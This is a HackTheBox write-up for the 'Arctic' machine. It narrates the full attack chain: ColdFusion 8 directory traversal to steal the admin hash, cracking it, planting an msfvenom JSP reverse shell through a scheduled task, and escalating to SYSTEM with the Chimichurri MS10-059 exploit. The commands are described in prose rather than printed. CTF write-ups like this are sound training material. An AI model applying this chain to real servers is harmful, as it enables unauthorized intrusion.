Arctic - HackTheBox Writeup
The link for this machine is located here: https://app.hackthebox.com/machines/9
This room contains a vulnerability in the Adobe ColdFusion program which we exploit to gain a reverse shell. Then, we exploit Windows kernel to escalate our privileges using Chimichurri.exe
Full Walkthrough
First thing we can do is run an Nmap scan to identify open ports with the following parameters:
-Pn to disable the initial ping
10.10.10.11 as the target IP
-oN default.scan to output to a file
This returns 3 ports open to us - 135, 8500, 49154. Knowing these ports are open, we can then scan them with a more detailed scan to gather more information about the services.
Still not a lot of information comes back. With port 8500, we can try and find out what could be running on it:
It seems likely to be relating to something called ColdFusion - i.e. a web server as that seems the most relevant for a CTF box although it could be a Duke Nukem 3D server who knows? Let’s solve the mystery by trying to find it in the browser.
This reveals a index with two initial directories - CFIDE and cfdocs. Doing some further research about the CFIDE, we find that it does relate to ColdFusion.
Additionally, as seen above, we can see that the default location of the Administrator login page is /CFIDE/administrator. To check if it exists, we can navigate into the CFIDE directory and look for /administrator.
We can see that the CFIDE/administrator page seems to exist. If we click on the administrator link, we get taken to the login panel.
The username is already pre-filled for us which we can’t seem to change. With this, we could potentially bruteforce this or use some default passwords but it’s a good idea to do that as a last resort.
Instead, we can first try and find any exploits that are available for ColdFusion 8 since it tells us the version at the top.
There are many vulnerabilities that come back include RCE and File Upload. However, one that stands out to be as more passive/less likely to crash it is the Directory Traversal exploit.
Here, we can see that we can simply navigate up to the ColdFusion8 directory inside the lib directory and grab what looks like the password properties file.
Let’s try it and see if it works.
Bingo! It works and it looks like the password hash is printed to the admin panel, allowing us to grab it and potentially crack it.
To identify the hash type, we can use a tool like hash-identifier and paste the hash.
This identifies it as SHA-1. With these, we can copy the hash to our local Windows host machine and use a tool like Hashcat with the GPU power to attempt to crack the password using the rockyou.txt wordlist.
Almost immediately, we get a cleartext password result for the hash - happyday.
With this password, we can now login to the Administrator panel.
We are taken to the home page. I have no idea what ColdFusion is or what functionality it can provide so time to do some research on potentially gaining a shell through it.
I stumbled upon this page which lays out the steps quite nicely - and is also a good read!
Following these steps, we can go to the left hand side of the page and click on the Mapping section.
Once there, we are able to find the directory path for the /CFIDE directory.
With this directory, we can then go to the Scheduled Tasks section under Debugging & Logging.
From here, we can input some information like Task Name, File and the URL. The Task Name and File cna be any name you specify, but the URL must connect back to our Linux machine where we will be hosting a malicious JSP file.
With this task created, we can create a malicious JSP shell using MSFvenom specifying the LHOST and LPORT we want it to connect.
Once generated, we can host it using a Python web server.
After everything is in place, we can create the task and it will appear under the table for Scheduled Tasks. From here, you will see the far left green button allows us to run the Scheduled Task.
If we click it and wait, we can see the task was completed successfully.
Looking back at our Python web server, we see a request that was made for the shell.jsp file from the target IP.
Now, if we navigate back to the /CFIDE directory index we saw earlier, our new malicious file should be hosted there - in my case called Rev-Shell-Time.jsp.
Before we click and execute it, we need to start a Netcat listener on port 443 to catch the reverse shell.
Then, we can execute it and we should get a CMD prompt pop in our Netcat listener which we do!
From here, we can proceed to navigate to the Desktop of the tolis user and grab the user flag for submission.
Next, we can perform some post-exploitation enumeration to try and find any privilege escalation vectors we can exploit.
The first thing I decide to run is the systeminfo command to gather information about the system we are on.
This reveals some important information for us such as the old OS running (Windows Server 2008 R2 Standard) and that the system is a 64-bit based system.
With a system as old as this, we can try and run a tool like Windows Exploit Suggester that will help us identify potential vulnerabilities we could exploit. First, we have to clone the GitHub repository.
Then, before running it, we have to update the database for it:
Then, to run it we need a TXT file that contains the output of the systeminfo command we ran earlier inside it. Once we have that, we can simply run it with the database created in the above command allowing with specifying the TXT file.
This returns a lot of results for us. However, 4 stood out to me as they have the option to potentially elevate our privileges.
Three of these relate to the Windows Kernel which I want to avoid if possible - they are the most likely to crash a system. However, one stands out - the Tracking Feature or MS10-059.
Researching this exploit reveals a GitHub for something called Chimichurri.
Navigating that repository, we are able to find a precompiled EXE file for the MS10-059 privilege escalation exploit.
With this, we can download it and host it using an SMB server inside a share called share.
Once hosted, we can connect the share on our machine by using the net use command. Once connected, we can then copy the Chimichurri.exe file to a directory (I choose C:\ProgramData).
Then, before execution, we start another Netcat listener on port 443.
Finally, reading the GitHub tells us how to run it. We simply specifying the IP address and port we want to connect to.
After execution, we can see we get a SYSTEM level shell on our Netcat listener!
Finally, to complete this box, we can navigate to the Admin’s desktop and grab the root flag for submission.
